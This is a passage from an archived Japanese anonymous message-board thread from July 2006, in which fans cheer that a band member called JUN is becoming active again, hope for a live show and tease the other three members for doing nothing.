739>>ヨンキュ―
チョ―楽しみなんだけど!!

741 :伝説の名無しさん:2006/07/26(水) 20:03:59
おぉぉぉーJUNやっと動くか!

742 :伝説の名無しさん:2006/07/26(水) 21:24:35
マジで!そりゃ最高!!早くライヌやんねぇーかな〜!!

743 :伝説の名無しさん:2006/07/26(水) 23:31:30
残りの三人は何やつてんの?JUN氏を見習つてほすいw

744 :伝説の名無しさん:2006/07/27(木) 12:36:57
ヤル気が有るか無いかの違いだよね

745 :伝説の名無しさん:2006/07/27(木) 16:57:50
レアリティ?

92 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)